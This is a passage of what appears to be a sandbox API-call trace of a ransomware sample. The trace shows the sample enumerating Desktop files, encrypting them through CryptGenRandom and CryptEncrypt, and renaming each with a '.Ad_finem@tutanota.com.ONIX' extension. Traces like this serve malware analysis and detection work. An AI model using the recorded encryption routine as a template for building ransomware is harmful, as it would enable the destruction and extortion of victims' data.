lpNumberOfBytesRead=0x367f44c*=0x9e54, lpOverlapped=0x0) returned 1 [0120.225] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-40532, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.225] WriteFile (in: hFile=0x4a4, lpBuffer=0xf50048*, nNumberOfBytesToWrite=0x9e54, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesWritten=0x367f44c*=0x9e54, lpOverlapped=0x0) returned 1 [0120.226] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0120.226] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf50048 | out: hHeap=0x410000) returned 1 [0120.226] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x9e54, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.226] CloseHandle (hObject=0x4a4) returned 1 [0120.227] GetProcessHeap () returned 0x410000 [0120.227] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.227] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bP4QhJNMiwpUMLCJp9Em.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bp4qhjnmiwpumlcjp9em.gif"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bP4QhJNMiwpUMLCJp9Em.gif.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bp4qhjnmiwpumlcjp9em.gif.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.230] GetProcessHeap () returned 0x410000 [0120.230] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0120.230] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.230] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0120.230] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a78 | out: hHeap=0x410000) returned 1 [0120.230] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b3ef340, ftCreationTime.dwHighDateTime=0x1d5e49b, ftLastAccessTime.dwLowDateTime=0x3a8c85c0, ftLastAccessTime.dwHighDateTime=0x1d5e752, ftLastWriteTime.dwLowDateTime=0x3a8c85c0, ftLastWriteTime.dwHighDateTime=0x1d5e752, nFileSizeHigh=0x0, nFileSizeLow=0xaed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="c0 GLD.jpg", cAlternateFileName="C0GLD~1.JPG")) returned 1 [0120.230] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.230] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.230] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.230] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.230] GetLastError () returned 0x0 [0120.230] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c0 GLD.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c0 gld.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.230] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.230] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xaed, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.230] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.230] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.231] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.231] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.231] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.231] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.231] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c0 GLD.jpg", dwFileAttributes=0x80) returned 1 [0120.232] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c0 GLD.jpg") returned 49 [0120.232] GetProcessHeap () returned 0x410000 [0120.232] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd2) returned 0x460008 [0120.232] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c0 GLD.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c0 GLD.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c0 GLD.jpg" [0120.232] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c0 GLD.jpg", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c0 GLD.jpg.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c0 GLD.jpg.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.232] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=2797) returned 1 [0120.232] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xaed [0120.232] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.232] GetProcessHeap () returned 0x410000 [0120.232] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0120.232] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.234] WriteFile (in: hFile=0x4a4, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.235] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.236] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.237] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xaed) returned 0x4d8b68 [0120.237] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xaed) returned 0x4d9660 [0120.237] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.237] ReadFile (in: hFile=0x4a4, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0xaed, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0xaed, lpOverlapped=0x0) returned 1 [0120.237] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-2797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.237] WriteFile (in: hFile=0x4a4, lpBuffer=0x4d9660*, nNumberOfBytesToWrite=0xaed, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d9660*, lpNumberOfBytesWritten=0x367f44c*=0xaed, lpOverlapped=0x0) returned 1 [0120.239] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0120.239] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d9660 | out: hHeap=0x410000) returned 1 [0120.239] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xaed, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.239] CloseHandle (hObject=0x4a4) returned 1 [0120.240] GetProcessHeap () returned 0x410000 [0120.240] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.240] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c0 GLD.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c0 gld.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c0 GLD.jpg.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c0 gld.jpg.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.242] GetProcessHeap () returned 0x410000 [0120.242] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.242] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.242] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0120.242] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43d858 | out: hHeap=0x410000) returned 1 [0120.242] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x575e57a0, ftCreationTime.dwHighDateTime=0x1d5ddd9, ftLastAccessTime.dwLowDateTime=0xea7caf40, ftLastAccessTime.dwHighDateTime=0x1d5da01, ftLastWriteTime.dwLowDateTime=0xea7caf40, ftLastWriteTime.dwHighDateTime=0x1d5da01, nFileSizeHigh=0x0, nFileSizeLow=0x14287, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="d7j5x fUh.gif", cAlternateFileName="D7J5XF~1.GIF")) returned 1 [0120.242] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.242] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.243] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.243] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.243] GetLastError () returned 0x0 [0120.243] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d7j5x fUh.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d7j5x fuh.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.243] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.243] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x14287, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.243] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.243] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.244] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.244] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.244] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.244] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.244] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d7j5x fUh.gif", dwFileAttributes=0x80) returned 1 [0120.244] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d7j5x fUh.gif") returned 52 [0120.244] GetProcessHeap () returned 0x410000 [0120.244] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd8) returned 0x460008 [0120.244] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d7j5x fUh.gif" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d7j5x fUh.gif") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d7j5x fUh.gif" [0120.244] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d7j5x fUh.gif", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d7j5x fUh.gif.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d7j5x fUh.gif.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.244] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=82567) returned 1 [0120.244] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x14287 [0120.245] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.245] GetProcessHeap () returned 0x410000 [0120.245] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0120.245] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.245] WriteFile (in: hFile=0x4a4, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.246] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.247] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.248] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14287) returned 0xf50048 [0120.249] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14287) returned 0xf642d8 [0120.249] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.249] ReadFile (in: hFile=0x4a4, lpBuffer=0xf50048, nNumberOfBytesToRead=0x14287, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x14287, lpOverlapped=0x0) returned 1 [0120.252] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-82567, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.252] WriteFile (in: hFile=0x4a4, lpBuffer=0xf642d8*, nNumberOfBytesToWrite=0x14287, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf642d8*, lpNumberOfBytesWritten=0x367f44c*=0x14287, lpOverlapped=0x0) returned 1 [0120.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf50048 | out: hHeap=0x410000) returned 1 [0120.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf642d8 | out: hHeap=0x410000) returned 1 [0120.253] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x14287, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.253] CloseHandle (hObject=0x4a4) returned 1 [0120.254] GetProcessHeap () returned 0x410000 [0120.254] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.254] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d7j5x fUh.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d7j5x fuh.gif"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d7j5x fUh.gif.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d7j5x fuh.gif.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.257] GetProcessHeap () returned 0x410000 [0120.257] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.257] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.257] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0120.257] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43d858 | out: hHeap=0x410000) returned 1 [0120.257] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0120.257] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.257] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.257] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.257] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.257] GetLastError () returned 0x0 [0120.257] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.257] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.257] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x11a, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.257] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0120.257] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.257] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.257] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.257] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini", dwFileAttributes=0x80) returned 1 [0120.258] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned 50 [0120.258] GetProcessHeap () returned 0x410000 [0120.258] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd4) returned 0x460008 [0120.258] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" [0120.258] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.258] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=282) returned 1 [0120.258] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x11a [0120.258] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.258] GetProcessHeap () returned 0x410000 [0120.258] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0120.258] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.260] WriteFile (in: hFile=0x4a4, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.262] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.263] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.264] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11a) returned 0x449878 [0120.264] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11a) returned 0x43a4a0 [0120.264] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.265] ReadFile (in: hFile=0x4a4, lpBuffer=0x449878, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x449878*, lpNumberOfBytesRead=0x367f44c*=0x11a, lpOverlapped=0x0) returned 1 [0120.265] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-282, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.265] WriteFile (in: hFile=0x4a4, lpBuffer=0x43a4a0*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x43a4a0*, lpNumberOfBytesWritten=0x367f44c*=0x11a, lpOverlapped=0x0) returned 1 [0120.266] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0120.266] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43a4a0 | out: hHeap=0x410000) returned 1 [0120.266] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x11a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.266] CloseHandle (hObject=0x4a4) returned 1 [0120.267] GetProcessHeap () returned 0x410000 [0120.267] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.267] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.272] GetProcessHeap () returned 0x410000 [0120.272] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.272] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.272] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0120.272] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43d858 | out: hHeap=0x410000) returned 1 [0120.272] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b4f8720, ftCreationTime.dwHighDateTime=0x1d5e1d9, ftLastAccessTime.dwLowDateTime=0x841b9350, 